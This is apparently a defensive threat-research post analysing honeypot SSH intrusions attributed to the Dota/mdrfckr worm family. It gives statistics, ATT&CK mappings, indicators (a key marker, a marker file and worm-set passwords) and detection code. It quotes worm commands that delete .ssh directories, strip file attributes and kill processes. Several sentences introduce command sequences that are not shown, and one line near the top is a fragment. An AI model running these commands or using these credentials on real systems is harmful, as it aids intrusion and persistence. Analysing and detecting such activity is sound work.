98% of SSH Intrusions Come from One Worm
A single honeypot sees around 1.4 million events per day. Most of it is noise. Very little results in actual compromise. We followed every real SSH intrusion over 8 days. Almost all of them led to the same system - or more precisely, the same worm family.
345gs5662d34 credential mechanism. The 98% finding is unaffected.
It looks noisy. In practice, it isn't.
Daily averages from a single honeypot:
| Layer | Volume | Description |
|---|---|---|
| All sensors | ~1.4M | Raw events (passive scans, fingerprinting, background radiation) |
| SSH-related | ~60,000 | Connection attempts, authentication events |
| Successful logins | ~531 | Authenticated SSH sessions |
| Post-login commands | ~4,700 | Actual attacker interaction |
From 1.4 million signals, only a few hundred lead to real access. Everything else is the internet talking to itself.
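The funnel can be made concrete with a few lines of arithmetic. This is a minimal sketch using only the daily averages from the table; the names `funnel` and `funnel_shares` are illustrative. The post-login command count is left out because it counts commands, not sessions.

```python
# Daily averages taken from the table above (approximate values).
funnel = [
    ("all_events", 1_400_000),
    ("ssh_related", 60_000),
    ("successful_logins", 531),
]

def funnel_shares(layers):
    """Return each layer's share of the first (outermost) layer."""
    total = layers[0][1]
    return {name: count / total for name, count in layers}

shares = funnel_shares(funnel)
for name, share in shares.items():
    print(f"{name:18s} {share:.4%}")
```

On these numbers, successful logins make up roughly 0.04% of all recorded events.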
Events are not attacks. This distinction matters. Most of what security dashboards count as "attacks" is noise: passive scans, failed connections, background internet radiation. Only sessions with successful authentication and post-login commands represent real intrusions.
Two datasets, one story
This analysis combines two views: volumetric baselines (24-hour averages for scale) and a behavioral dataset (8 days of classified sessions for depth).
Methodology
- Sensor: T-Pot honeypot with Cowrie SSH emulation
- All commands are logged with timestamps
- Raw commands are normalized into abstract actions (e.g. rm -rf → cleanup)
- Sessions with sufficient depth are converted into behavioral sequences
- Sequences are clustered into behavioral fingerprints
- A session requires successful login + observable command execution
Sessions with only minimal interaction (1–2 commands) may not contain enough signal for behavioral classification. This matters for the numbers below.
Dataset Construction
- Total successful SSH authentications (8 days): ~4,248
- Sessions with post-login commands: 1,021
- Sessions with sufficient depth for behavioral classification: 1,021
- Sessions attributed to Dota worm family: 1,005 (98%)
Short sessions (login followed by immediate disconnect or 1–2 trivial commands) were excluded from behavioral analysis due to insufficient signal. The 98% figure refers specifically to sessions with enough interaction to construct a behavioral fingerprint.
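The headline ratio follows directly from the counts above. A short sketch of the arithmetic, with variable names chosen here for illustration:

```python
authenticated = 4_248  # successful SSH authentications over 8 days (approximate)
classified = 1_021     # sessions with enough depth to fingerprint
dota = 1_005           # sessions attributed to the Dota worm family

dota_share = dota / classified                # share of classified sessions
classified_share = classified / authenticated  # share of logins that were classifiable
non_dota = classified - dota                   # sessions outside the family

print(f"Dota share of classified sessions: {dota_share:.1%}")
print(f"Classified share of all logins:    {classified_share:.1%}")
print(f"Non-Dota classified sessions:      {non_dota}")
```

The 98% figure is a share of the 1,021 classified sessions, not of all ~4,248 authentications; about a quarter of logins produced enough interaction to classify.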
98% of classified intrusions - one worm
From the 8-day behavioral dataset:
| Metric | Value |
|---|---|
| Total sessions with commands | 1,021 |
| Unique source IPs | 614 |
| Countries | 69 |
| Behavioral fingerprints | 17 |
| Linked to one worm family | 1,005 (98%) |
This isn't similar behavior or loose correlation. It's the same system. A self-propagating SSH worm operating across hundreds of compromised machines.
Meet the worm: Dota
Named after its payload archive: dota3.tar.gz.
Across the dataset, 614 unique source IPs were observed, of which 605 were linked to the Dota worm family, spanning 69 countries.
These are not independent attackers. They are compromised systems participating in propagation.
Prior research. Variants of the Dota/mdrfckr SSH worm have been documented in previous analyses, including reports by AhnLab and multiple honeypot operators. These studies describe the worm's propagation via SSH key injection and its use of automated deployment scripts.
What is new here: This investigation does not focus on payload analysis or infrastructure tracking. Instead, it introduces behavioral fingerprinting to cluster sessions, identify variant families, and quantify their dominance over a continuous observation window.
Every variant shares one invariant marker: an SSH public key injected into authorized_keys, carrying the comment mdrfckr.
That SSH key appears across all variants. It acts as the worm's fingerprint.
Payload analysis is outside the scope of this behavioral study. This investigation focuses on observable command sequences and interaction patterns rather than post-deployment functionality.
A deterministic kill chain
Once inside, the worm doesn't improvise. It executes a fixed sequence, consistently observed across hundreds of sessions:
All commands arrive within sub-second intervals. There are no pauses or typing delays. Execution is fully automated.
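One way to test for this kind of automation is to measure the gaps between consecutive command timestamps in a session. The sketch below assumes ISO 8601 timestamps with a trailing `Z`; the one-second threshold, the function names, and the sample timestamps are illustrative assumptions, not values from the dataset.

```python
from datetime import datetime

def command_gaps(timestamps):
    """Return gaps in seconds between consecutive ISO 8601 timestamps."""
    parsed = sorted(
        datetime.fromisoformat(ts.replace("Z", "+00:00")) for ts in timestamps
    )
    return [(b - a).total_seconds() for a, b in zip(parsed, parsed[1:])]

def looks_automated(timestamps, max_gap=1.0):
    """True if every gap between commands is below max_gap seconds.

    max_gap is an assumed threshold; tune it against your own data.
    """
    gaps = command_gaps(timestamps)
    return bool(gaps) and max(gaps) < max_gap

# Made-up timestamps for illustration only.
scripted = [
    "2024-01-01T00:00:00.100000Z",
    "2024-01-01T00:00:00.350000Z",
    "2024-01-01T00:00:00.900000Z",
]
typed = ["2024-01-01T00:00:00Z", "2024-01-01T00:00:07Z"]

print(looks_automated(scripted), looks_automated(typed))
```

A session with a single command has no gaps and is reported as not automated, which matches the article's point that very short sessions carry too little signal.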
ATT&CK Mapping
| Stage | Technique | ID |
|---|---|---|
| Initial Access | Remote Services: SSH | T1021.004 |
| Persistence | SSH Authorized Keys | T1098.004 |
| Execution | Unix Shell | T1059.004 |
| Discovery | System Information Discovery | T1082 |
| Propagation | Remote System Discovery | T1018 |
Decisions after the breach
The worm doesn't evaluate targets before compromise. It breaks in first. Then it profiles the system: CPU cores, RAM, disk space, CPU model.
What we observe vs. what we infer. The profiling pattern strongly suggests resource classification, likely distinguishing between mining-capable systems and propagation-only nodes. This is an inference, not a directly observed decision. Due to honeypot constraints, we cannot observe the worm's internal decision logic after profiling.
The most dangerous part: internal propagation
After installation, the worm scans:
This is not internet-wide scanning. This is propagation targeting private address space. One exposed SSH service can become an entry point into an entire internal network.
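When reviewing scan targets extracted from session logs, a quick check can separate private from public destinations. This sketch assumes "private address space" means the three RFC 1918 IPv4 ranges; the exact ranges the worm scans are not listed here, so treat the list as an assumption. `is_internal` is a hypothetical helper name.

```python
import ipaddress

# Assumption: RFC 1918 private IPv4 ranges.
RFC1918 = [
    ipaddress.ip_network(net)
    for net in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

def is_internal(addr):
    """True if addr falls inside one of the RFC 1918 ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)

for target in ("10.1.2.3", "172.20.0.5", "192.168.1.10", "8.8.8.8"):
    print(target, is_internal(target))
```

Explicit ranges are used instead of `ip.is_private` because that property also covers loopback, link-local, and other reserved blocks.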
It knows if you're already infected
Before deploying, the worm checks for its marker file, /var/tmp/.systemcache436621.
If the file exists, the system is already infected. Deployment is skipped. This is a built-in deduplication mechanism that reduces redundant infections, instability, and noise. This points to controlled propagation, not sloppy malware.
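Defenders can run the same check from their side. The sketch below looks for the marker file path listed under Indicators; the `root` parameter is an addition for illustration so the check can be pointed at a mounted disk image or test directory. It shows a defender-side lookup, not the worm's own command, which is not reproduced here.

```python
from pathlib import Path

# Marker file path from the Indicators table, relative to a filesystem root.
MARKER = "var/tmp/.systemcache436621"

def has_dota_marker(root="/"):
    """True if the worm's reinfection marker exists under the given root."""
    return (Path(root) / MARKER).exists()

if __name__ == "__main__":
    print("marker present:", has_dota_marker())
```

A missing marker does not prove a host is clean; it only means this one indicator is absent.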
Behavioral DNA: tracking without IOCs
IP tracking fails here. The worm rotates across hundreds of compromised systems. Each infection becomes a new source. Tracking IPs means tracking victims, not the attacker.
Instead, we normalize behavior:
| Command | Normalized Action |
|---|---|
| chattr -ia .ssh | persist |
| rm -rf .ssh | cleanup |
| pkill -9 secure.sh | kill_process |
| cat /proc/cpuinfo | recon_system |
| echo creds > file | write_file |
Each session becomes a sequence - its Behavioral DNA:
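A minimal sketch of the normalization step, built only from the five example mappings in the table. The regular expressions, the `other` fallback label, and the function names are assumptions made for illustration; the actual rule set behind this analysis is not published here.

```python
import re

# Ordered (pattern, action) rules derived from the example table.
RULES = [
    (re.compile(r"^chattr\s+-ia\b"), "persist"),
    (re.compile(r"^rm\s+-rf\b"), "cleanup"),
    (re.compile(r"^pkill\s+-9\b"), "kill_process"),
    (re.compile(r"^cat\s+/proc/cpuinfo\b"), "recon_system"),
    (re.compile(r"^echo\s+.*>"), "write_file"),
]

def normalize(command):
    """Map a raw shell command to an abstract action label."""
    command = command.strip()
    for pattern, action in RULES:
        if pattern.search(command):
            return action
    return "other"  # assumed fallback for commands without a rule

def behavioral_dna(commands):
    """Join the normalized actions of one session into a sequence string."""
    return " → ".join(normalize(c) for c in commands)

session = ["chattr -ia .ssh", "rm -rf .ssh", "cat /proc/cpuinfo"]
print(behavioral_dna(session))
```

Matching on the command and its flags rather than its arguments keeps the sequence stable when file names or paths vary between variants.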
It's not one worm - it's a family
Behavioral analysis revealed 17 fingerprints, 10 linked to the Dota family. Three variants dominate, each with a distinct DNA sequence:
ssh-rsa AAAA...== mdrfckr · 605 IPs · 69 countries
Unlike IOCs, behavioral DNA survives IP rotation, infrastructure changes, and payload variations.
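To illustrate how sequences can be grouped into fingerprints, the sketch below hashes each action sequence and counts identical hashes. Exact-match hashing is an assumption chosen for simplicity; the clustering method used in this analysis is not specified, and a real pipeline might tolerate small differences between sequences. The session IDs and sequences are made up.

```python
import hashlib
from collections import Counter

def fingerprint(actions):
    """Short, stable identifier for one sequence of normalized actions."""
    joined = ">".join(actions)
    return hashlib.sha256(joined.encode("utf-8")).hexdigest()[:12]

def cluster(sessions):
    """Count sessions per fingerprint.

    sessions: dict mapping session ID to a list of normalized actions.
    """
    return Counter(fingerprint(actions) for actions in sessions.values())

# Hypothetical sessions from different source IPs.
sessions = {
    "s1": ["persist", "cleanup", "persist", "recon_system"],
    "s2": ["persist", "cleanup", "persist", "recon_system"],
    "s3": ["kill_process", "persist", "recon_system"],
}

for fp, count in cluster(sessions).most_common():
    print(fp, count)
```

Because the fingerprint depends only on the action sequence, two sessions from unrelated IP addresses land in the same cluster.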
Infected systems are contested, not owned
The competitor-killer variant changes the picture. Before installing itself, it runs:
It removes competing malware. An infected server is not simply "compromised" but rather contested infrastructure. Multiple malware families compete for persistence, CPU resources, and network position. The Dota worm actively eliminates rivals.
The passwords tell you where it came from
Observed credentials set by the worm: 345gs5662d34 and 3245gs5662d34.
If these appear in your logs, the source is not a human attacker. It is another infected system. The worm leaves fingerprints across the internet.
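A sketch of how such a search might look against JSON-lines honeypot logs. It assumes Cowrie-style login events with `eventid`, `password`, and `src_ip` fields; verify the field names against your own log output before relying on it. The sample events use documentation IP addresses and are invented.

```python
import json

# Worm-set passwords from the Indicators table.
WORM_PASSWORDS = {"345gs5662d34", "3245gs5662d34"}

def worm_logins(lines):
    """Return (src_ip, password) for login events using a worm-set password."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines
        if not isinstance(event, dict):
            continue
        is_login = str(event.get("eventid", "")).startswith("cowrie.login.")
        if is_login and event.get("password") in WORM_PASSWORDS:
            hits.append((event.get("src_ip"), event.get("password")))
    return hits

# Invented sample events for illustration.
sample = [
    '{"eventid": "cowrie.login.success", "src_ip": "192.0.2.10", "password": "345gs5662d34"}',
    '{"eventid": "cowrie.login.failed", "src_ip": "192.0.2.11", "password": "admin"}',
    "not json",
]
print(worm_logins(sample))
```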
Indicators
| Type | Value | Description |
|---|---|---|
| SSH Key | mdrfckr | Injected authorized_keys marker |
| Marker File | /var/tmp/.systemcache436621 | Reinfection check |
| Credentials | 345gs5662d34, 3245gs5662d34 | Worm-set passwords |
| Payload | dota3.tar.gz | Archive name used during deployment |
Sample size and generalization
This dataset comes from one honeypot, 8 days of observation, 1,021 sessions. Does this represent the entire internet? Not necessarily.
However: 69 countries, ~605 source systems, and consistent behavioral patterns across all sessions strongly indicate a globally distributed, coordinated campaign, not isolated activity.
Limitations.
- Single vantage point (one honeypot, one IP, one country)
- Cowrie interaction constraints (medium-interaction emulation)
- Behavior may differ on fully compromised production systems
- Fingerprint-aware malware may evade behavioral classification
- 8-day window - longer observation may shift ratios
The real insight: a monoculture
Within sessions that provided enough behavioral signal: ~98% belong to a single worm family.
This is not thousands of independent attackers. It's a monoculture. A self-replicating system moving across hundreds of machines, continuously reinfecting the internet.
If you track IPs, block regions, or count "attacks", you are measuring noise. The signal is in the behavior. The real threat is not individual attackers but autonomous systems that propagate, adapt, compete, and persist.
Defender takeaway. If you operate SSH sensors or review Cowrie logs, look for:
- SSH key marker: mdrfckr
- Marker file: /var/tmp/.systemcache436621
- Credential patterns: 345gs5662d34
- Behavioral sequence: persist → cleanup → persist → recon
Fingerprint and subtract this activity. What remains is a much smaller set of sessions that warrant deeper investigation.
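The subtraction step can be sketched as a simple filter over session transcripts. This example matches the string indicators from the Indicators table against each session's commands; the session structure, the session IDs, and the helper names are hypothetical, and plain substring matching is a simplification of behavioral fingerprinting.

```python
# String indicators from the Indicators table.
INDICATORS = (
    "mdrfckr",
    "/var/tmp/.systemcache436621",
    "345gs5662d34",
    "3245gs5662d34",
)

def is_dota(commands):
    """True if any command in the session contains a known indicator."""
    text = "\n".join(commands)
    return any(indicator in text for indicator in INDICATORS)

def subtract_dota(sessions):
    """Return only the sessions that match none of the indicators.

    sessions: dict mapping session ID to a list of raw command strings.
    """
    return {sid: cmds for sid, cmds in sessions.items() if not is_dota(cmds)}

# Hypothetical sessions for illustration.
sessions = {
    "a1": ['echo "ssh-rsa AAAA...== mdrfckr" >> .ssh/authorized_keys'],
    "a2": ["ls /var/tmp/.systemcache436621"],
    "b7": ["uname -a", "wget http://example.invalid/x.sh"],
}
print(sorted(subtract_dota(sessions)))
```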
This is the first public investigation from NullRoute.
Future publications will cover behavioral clustering, credential reuse campaigns, and attacker decision patterns observed across multiple sensors.
The 2% that is not Dota is where the interesting threats begin.